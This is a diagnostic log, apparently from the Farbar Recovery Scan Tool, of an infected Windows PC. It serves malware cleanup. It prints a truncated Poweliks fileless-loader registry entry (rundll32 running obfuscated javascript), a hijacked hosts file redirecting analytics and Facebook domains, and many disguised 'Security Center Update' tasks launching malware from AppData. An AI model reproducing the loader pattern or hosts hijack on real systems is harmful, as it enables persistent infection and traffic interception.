AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Enabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
802.11n Wireless LAN Card (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 3.02.03.0 - Ralink)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.3.300.257 - Adobe Systems Incorporated)
Adobe Reader X (10.1.11) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.11 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\...\{C2956908-53A3-88FC-B795-B16508296FC4}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Blio (HKLM-x32\...\{741006D1-7B2B-4E33-B2B0-831F282EEF64}) (Version: 2.2.8188 - K-NFB Reading Technology, Inc.)
Bubble Wrap (HKLM-x32\...\{5BFFDDEB-AFD7-499F-BB13-7A6EAD927CDA}_is1) (Version: 1.0.0.0 - XM Asia Pacific Pte Ltd)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.0.4417 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
Facebook (HKLM-x32\...\{8AE50893-3A87-4439-9A57-942ED43F7189}) (Version: 1.1.0004 - Hewlett-Packard)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.71 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Application Assistant (HKLM\...\{B34A07DD-C6F7-414A-AE63-01019482EAF0}) (Version: 1.0.393.3870 - Hewlett-Packard)
HP Calendar (HKLM-x32\...\{2B38E0FA-D8A5-4EBF-A018-E3C1C8E7A2E2}) (Version: 5.1.4245.23508 - Hewlett-Packard)
HP Clock (HKLM-x32\...\{0EEC4E49-D4C2-4E23-87F2-B5641F1A09E4}) (Version: 5.1.4244.16367 - Hewlett-Packard)
HP LinkUp (HKLM-x32\...\{7E750542-55BC-4300-8B7B-AC2A762FB435}) (Version: 2.01.029 - Hewlett-Packard)
HP Magic Canvas (HKLM-x32\...\{DDFDC9D6-4220-41F8-BF9A-8E7512C4EF52}) (Version: 5.1.15.0 - Hewlett-Packard)
HP Magic Canvas Tutorials (HKLM-x32\...\{858FCB65-7C6D-4BA4-AD80-A3CB3744CE09}_is1) (Version: 5.0.0.3 - Hewlett-Packard)
HP MovieStore (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.1.21091.0 - Hewlett-Packard Company)
HP Notes (HKLM-x32\...\{86BAB08A-5E66-4C53-82E3-C1E91673C7CA}) (Version: 5.1.4274.30382 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP RSS (HKLM-x32\...\{A35E58D6-2A0F-4051-983B-79342081338E}) (Version: 5.1.4301.21494 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15076.3891 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 11.00.0001 - Hewlett-Packard)
HP TouchSmart RecipeBox (HKLM-x32\...\{20714B53-FC73-4F9C-9687-49EB237D6FD7}) (Version: 3.0.3830.27730 - Hewlett-Packard)
HP Update (HKLM-x32\...\{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}) (Version: 5.003.001.001 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.12.1.0 - Hewlett-Packard)
HP Weather (HKLM-x32\...\{8364E531-493B-4B05-8041-09D5CE38B975}) (Version: 5.1.4295.16450 - Hewlett-Packard)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.4507 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.4507 - CyberLink Corp.) Hidden
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Metric Converter (HKLM-x32\...\{D0661463-50F7-4A1E-83CB-37CC590589AE}_is1) (Version: 1.0.0.0 - XM Asia Pacific Pte Ltd)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Mathematics (HKLM-x32\...\{4D090F70-6F08-4B60-9357-A1DFD4458F09}) (Version: 4.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.5139.5005 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Office Depot PC Support Agent (HKLM-x32\...\Office Depot PC Support Agent) (Version: 70.0.17.1 - Support.com, Inc.)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.5705 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.5705 - CyberLink Corp.) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6456 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.0.4424 - CyberLink Corp.) Hidden
Remote Graphics Receiver (HKLM-x32\...\{16FC3056-90C0-4757-8A68-64D8DA846ADA}) (Version: 5.4.5 - Hewlett-Packard)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
ShopAtHome.com Helper (HKU\S-1-5-21-3098917091-2276340468-633939820-1000\...\ShopAtHome.com Helper) (Version: 7.10.0.6 - ShopAtHome.com) <==== ATTENTION
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
smartmontools (HKLM-x32\...\smartmontools) (Version: 5.42 2011-10-20 r3458 (sf-win32-5.42-1) - )
Tap Tap Bear (HKLM-x32\...\{A393CDFF-BEB8-48EA-990D-2EB35B311D23}_is1) (Version: 1.0.0.0 - XM Asia Pacific Pte Ltd)
TSHostedAppLauncher (x32 Version: 5.1.15.0 - Hewlett-Packard) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-3098917091-2276340468-633939820-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
==================== Restore Points =========================
08-11-2014 18:27:54 Scheduled Checkpoint
12-11-2014 17:17:35 Windows Update
25-11-2014 21:59:29 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727
25-11-2014 22:18:20 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 20:34 - 2014-11-25 15:48 - 00001509 _RASH C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
185.53.9.209 www.google-analytics.com.
185.53.9.209 google-analytics.com.
185.53.9.209 connect.facebook.net.
195.162.69.252 www.google-analytics.com.
195.162.69.252 google-analytics.com.
195.162.69.252 connect.facebook.net.
212.47.195.215 www.google-analytics.com.
212.47.195.215 google-analytics.com.
212.47.195.215 connect.facebook.net.
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {010F28A6-A0ED-4BE8-804E-B3D7E48074C6} - System32\Tasks\GoogleUpdateTaskMachineUA1cfff61ac267ea => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-22] (Google Inc.)
Task: {02064DF4-7BA8-4179-8DB7-2080D5CF41C6} - System32\Tasks\Security Center Update - 1697682034 => C:\Users\Glynnda\AppData\Roaming\Daikequ\eptiy.exe [2013-05-14] (Anubisel Corporatu) <==== ATTENTION
Task: {1073C297-F11D-4F2A-BDE7-4C541D765D32} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {24A8BF72-036C-4995-AF87-BD95D930133A} - System32\Tasks\Security Center Update - 2593297739 => C:\Users\Glynnda\AppData\Roaming\Sukamo\nekii.exe [2014-03-21] (Anubisel Corporatu) <==== ATTENTION
Task: {2510B774-8BB2-4E75-B90C-255C76C24630} - System32\Tasks\Security Center Update - 1752710425 => C:\Users\Glynnda\AppData\Roaming\Ogoxytp\roqeowk.exe <==== ATTENTION
Task: {2A9D3700-9667-4648-B05D-F82908AD017A} - System32\Tasks\Security Center Update - 3161201767 => C:\Users\Glynnda\AppData\Roaming\Yrybmig\leunu.exe <==== ATTENTION
Task: {2DAD91F5-7F38-4985-8462-F1A67FDF2C79} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {307B48C3-873B-4B29-A53A-DF02D3D3129E} - System32\Tasks\GoogleUpdateTaskMachineUA1cf244ee1223503 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-22] (Google Inc.)
Task: {348914EB-2E1C-45F1-A0C9-1213673372B0} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2011-08-17] (CyberLink)
Task: {396DAAAA-2116-41EF-B37D-CE97A14B191B} - System32\Tasks\Security Center Update - 1079130923 => C:\Users\Glynnda\AppData\Roaming\Arulgyi\ygluil.exe [2013-04-07] (Anubisel Corporatu) <==== ATTENTION
Task: {40B45342-549B-4B2E-BDDE-59C041283C5C} - System32\Tasks\Security Center Update - 713791217 => C:\Users\Glynnda\AppData\Roaming\Abizehd\umepx.exe [2013-11-30] (Anubisel Corporatu) <==== ATTENTION
Task: {47396FA2-5B67-453A-AD7F-82BBCD2126E5} - System32\Tasks\Security Center Update - 1331730204 => C:\Users\Glynnda\AppData\Roaming\Cugyluwy\kupee.exe [2013-06-22] (Anubisel Corporatu) <==== ATTENTION
Task: {473B0D75-0D02-4515-B3F8-CE5679CE2127} - System32\Tasks\RMCreator => C:\Program Files (x86)\Hewlett-Packard\Recovery\Reminder.exe [2011-08-23] (CyberLink)
Task: {533A1B29-86D8-4642-87EB-36A0A2BB6B42} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {5FDE8316-1FC4-48DD-A276-8C6858873357} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {6C429B2F-7201-45ED-89AF-0FF8BC9B061A} - System32\Tasks\Security Center Update - 1468541840 => C:\Users\Glynnda\AppData\Roaming\Ukseusv\ywzuc.exe [2014-03-29] (Anubisel Corporatu) <==== ATTENTION
Task: {715FF314-4C2D-4249-AD5B-9DF85EEE8B46} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2014-10-21] (Hewlett-Packard)
Task: {8194F5FF-89C7-402C-A44A-D417F4DE6E54} - System32\Tasks\Security Center Update - 399393453 => C:\Users\Glynnda\AppData\Roaming\Toepexy\ufibxei.exe [2013-09-11] (Anubisel Corporatu) <==== ATTENTION
Task: {8C1488A6-67B5-4298-9E18-0E2EAA76EF2F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2014-10-21] (Hewlett-Packard)
Task: {8FA49C20-7919-4078-ACEC-5DC86F237230} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {90FBD851-DFD3-4836-904B-3BC4CAF57949} - System32\Tasks\Security Center Update - 193677934 => C:\Users\Glynnda\AppData\Roaming\Ichateg\ixirebz.exe [2013-07-08] (Anubisel Corporatu) <==== ATTENTION
Task: {9506329E-177F-4242-AE6C-1ED28847B6A0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-11-04] (Hewlett-Packard Company)
Task: {988574F6-2B76-4099-9022-90E1BA37CA65} - System32\Tasks\Security Center Update - 1571542829 => C:\Users\Glynnda\AppData\Roaming\Voveif\onlak.exe [2014-06-15] (Anubisel Corporatu) <==== ATTENTION
Task: {B80A5ED7-31A3-427E-948F-BC0D7AA66E13} - System32\Tasks\Security Center Update - 605811440 => C:\Users\Glynnda\AppData\Roaming\Nuvimefo\irtoo.exe [2014-11-10] (Anubisel Corporatu) <==== ATTENTION
Task: {BB23D367-70B4-46BD-AEED-222C7EF5205E} - System32\Tasks\Security Center Update - 859257726 => C:\Users\Glynnda\AppData\Roaming\Wyxylo\ortoy.exe [2012-09-19] (Anubisel Corporatu) <==== ATTENTION
Task: {BF3A2414-0666-47A4-810D-5CC91F1FAA39} - System32\Tasks\HPCeeScheduleForGlynnda => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {C2D8D1F2-9516-4180-A9F4-6390800B5CA6} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\Dependencies\RemEngine.exe [2011-09-28] ()
Task: {D31E51F3-3430-455C-B08E-DA6D6965C575} - System32\Tasks\Security Center Update - 148162692 => C:\Users\Glynnda\AppData\Roaming\Ovuzso\anama.exe [2013-05-15] (Anubisel Corporatu) <==== ATTENTION
Task: {D87C9382-6581-4AE6-9980-80B93E2CD4E8} - System32\Tasks\GoogleUpdateTaskMachineUA1cfee62e1a80a0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-22] (Google Inc.)
Task: {DFED804B-EB5B-4C6F-8940-9A4E2D4FF70A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-22] (Google Inc.)
Task: {E162E145-AE81-43FB-B557-B3E980B84C5F} - System32\Tasks\Security Center Update - 3166402688 => C:\Users\Glynnda\AppData\Roaming\Azcaoh\xyheepe.exe [2013-08-16] (Anubisel Corporatu) <==== ATTENTION
Task: {FA6ED641-47C2-42FF-B907-683F751B7F76} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3098917091-2276340468-633939820-1000
Task: {FF7BF758-52BA-4298-8C7B-429934F3F8E2} - System32\Tasks\Security Center Update - 2418676004 => C:\Users\Glynnda\AppData\Roaming\Dikiudaz\ycumbya.exe [2012-08-20] (Anubisel Corporatu) <==== ATTENTION
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cf244ee1223503.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfee62e1a80a0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfff61ac267ea.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForGlynnda.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\Security Center Update - 1079130923.job => C:\Users\Glynnda\AppData\Roaming\Arulgyi\ygluil.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 1331730204.job => C:\Users\Glynnda\AppData\Roaming\Cugyluwy\kupee.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 1468541840.job => C:\Users\Glynnda\AppData\Roaming\Ukseusv\ywzuc.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 148162692.job => C:\Users\Glynnda\AppData\Roaming\Ovuzso\anama.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 1571542829.job => C:\Users\Glynnda\AppData\Roaming\Voveif\onlak.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 1697682034.job => C:\Users\Glynnda\AppData\Roaming\Daikequ\eptiy.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 193677934.job => C:\Users\Glynnda\AppData\Roaming\Ichateg\ixirebz.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 2418676004.job => C:\Users\Glynnda\AppData\Roaming\Dikiudaz\ycumbya.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 2593297739.job => C:\Users\Glynnda\AppData\Roaming\Sukamo\nekii.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3166402688.job => C:\Users\Glynnda\AppData\Roaming\Azcaoh\xyheepe.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 399393453.job => C:\Users\Glynnda\AppData\Roaming\Toepexy\ufibxei.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 605811440.job => C:\Users\Glynnda\AppData\Roaming\Nuvimefo\irtoo.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 713791217.job => C:\Users\Glynnda\AppData\Roaming\Abizehd\umepx.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 859257726.job => C:\Users\Glynnda\AppData\Roaming\Wyxylo\ortoy.exe <==== ATTENTION
==================== Loaded Modules (whitelisted) =============
2014-09-15 18:13 - 2014-09-15 18:13 - 00127488 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2014-09-15 18:13 - 2014-09-15 18:13 - 00102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2014-10-17 01:24 - 2014-10-17 01:24 - 00044032 _____ () C:\Program Files (x86)\Office Depot PC Support Agent\ESResources.dll
2014-11-26 17:51 - 2014-11-25 00:39 - 01077064 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.71\libglesv2.dll
2014-11-26 17:51 - 2014-11-25 00:39 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.71\libegl.dll
2014-11-26 17:51 - 2014-11-25 00:39 - 09009480 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.71\pdf.dll
2014-11-26 17:51 - 2014-11-25 00:39 - 01677128 _____ () C:\Program Files (x86)\Google\Chrome\Application\39.0.2171.71\ffmpegsumo.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-3098917091-2276340468-633939820-500 - Administrator - Disabled)
Glynnda (S-1-5-21-3098917091-2276340468-633939820-1000 - Administrator - Enabled) => C:\Users\Glynnda
Guest (S-1-5-21-3098917091-2276340468-633939820-501 - Limited - Disabled)
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (12/07/2014 02:42:05 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (12/02/2014 08:54:39 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (12/02/2014 08:36:05 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (12/02/2014 08:26:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CCC.exe, version: 4.5.0.0, time stamp: 0x53ad0dcc
Faulting module name: amdmantle64.dll_unloaded, version: 0.0.0.0, time stamp: 0x5417637b
Exception code: 0xc0000005
Fault offset: 0x000007fee689dee0
Faulting process id: 0xe08
Faulting application start time: 0xCCC.exe0
Faulting application path: CCC.exe1
Faulting module path: CCC.exe2
Report Id: CCC.exe3
Error: (12/02/2014 08:26:19 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: CCC.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: exception code c0000005, exception address 000007FEE689DEE0
Error: (11/30/2014 07:25:01 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (11/30/2014 01:20:21 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (11/30/2014 09:35:34 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (11/27/2014 07:49:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Explorer.EXE, version: 6.1.7601.17567, time stamp: 0x4d672ee4
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521eaf24
Exception code: 0xc000070a
Fault offset: 0x000000000005cf99
Faulting process id: 0x174
Faulting application start time: 0xExplorer.EXE0
Faulting application path: Explorer.EXE1
Faulting module path: Explorer.EXE2
Report Id: Explorer.EXE3
Error: (11/27/2014 07:47:46 PM) (Source: PerfNet) (EventID: 2004) (User: )
Description:
System errors:
=============
Error: (12/07/2014 02:35:07 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The McAfee Platform Services service failed to start due to the following error:
%%2
Error: (12/07/2014 02:34:31 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Home Network service depends the following service: MfeFire. This service might not be installed.
Error: (12/07/2014 02:33:57 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Error: (12/07/2014 02:31:50 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Anti-Malware Core service depends the following service: mfevtp. This service might not be installed.
Error: (12/07/2014 02:31:50 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee AP Service service depends the following service: mfevtp. This service might not be installed.
Error: (12/02/2014 08:51:03 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 40. The internal error state is 252.
Error: (12/02/2014 08:47:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The McAfee Platform Services service failed to start due to the following error:
%%2
Error: (12/02/2014 08:47:14 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Home Network service depends the following service: MfeFire. This service might not be installed.
Error: (12/02/2014 08:46:31 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Error: (12/02/2014 08:44:15 PM) (Source: Service Control Manager) (EventID: 7003) (User: )
Description: The McAfee Anti-Malware Core service depends the following service: mfevtp. This service might not be installed.
Microsoft Office Sessions:
=========================
Error: (12/07/2014 02:42:05 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (12/02/2014 08:54:39 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Error: Initialization failed 0x80070422 Type: 88::UnexpectedError.
Error: (12/02/2014 08:36:05 PM) (Source: CVHSVC) (EventID: 100) (User: )
